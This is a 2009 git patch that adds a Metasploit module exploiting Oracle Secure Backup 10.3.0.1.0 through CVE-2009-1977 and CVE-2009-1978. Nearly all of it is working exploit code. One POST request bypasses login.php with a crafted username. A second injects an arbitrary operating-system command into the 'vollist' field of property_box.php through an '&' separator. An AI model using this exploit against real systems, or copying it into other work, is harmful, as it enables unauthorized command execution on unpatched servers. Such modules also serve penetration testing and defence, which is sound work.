From e0e9ad670fe2494dc8b5bf2f604680042dae75cd Mon Sep 17 00:00:00 2001
From: Mario Ceballos <mc@metasploit.com>
Date: Wed, 16 Sep 2009 12:07:07 +0000
Subject: [PATCH] added auxiliary module osb_execqr2.rb

git-svn-id: file:///home/svn/framework3/trunk@7038 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/auxiliary/admin/oracle/osb_execqr2.rb | 74 +++++++++++++++++++
 1 file changed, 74 insertions(+)
 create mode 100644 modules/auxiliary/admin/oracle/osb_execqr2.rb

diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb
new file mode 100644
index 0000000000..b0c68b90b3
--- /dev/null
+++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb
@@ -0,0 +1,74 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
+			'Description'    => %q{
+					This module exploits an authentication bypass vulnerability 
+					in login.php in order to execute arbitrary code via a command injection 
+					vulnerability in property_box.php. This module was tested 
+					against Oracle Secure Backup version 10.3.0.1.0 (Win32).
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'CVE', '2009-1977' ],
+					[ 'CVE', '2009-1978' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-058' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-059' ],
+				],
+			'DisclosureDate' => 'Aug 18 2009'))
+
+		register_options(
+			[
+				Opt::RPORT(443),
+				OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
+				OptBool.new('SSL',   [true, 'Use SSL', true]),
+			], self.class)
+	end
+
+	def run
+
+		cmd = datastore['CMD']
+	
+		res = send_request_cgi(
+			{
+				'uri'	=>  '/login.php',
+				'data'	=>  'button=Login&attempt=1&mode=&tab=75&uname=-msf&passwd=msf',
+				'method' => 'POST',
+			}, 5)
+
+			if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
+
+				sessionid = res.headers['Set-Cookie'].split(';')[0]
+
+					print_status("Sending command: #{datastore['CMD']}...")
+	
+					send_request_cgi(
+						{
+							'uri'	=> '/property_box.php',
+							'data'  => 'type=Sections&vollist=75' + Rex::Text.uri_encode("&" + cmd),
+							'cookie' => sessionid,
+							'method' => 'POST',
+						}, 5)
+
+					print_status("Done.")
+			else
+				print_error("Invalid PHPSESSION token..")
+				return
+			end
+	end
+end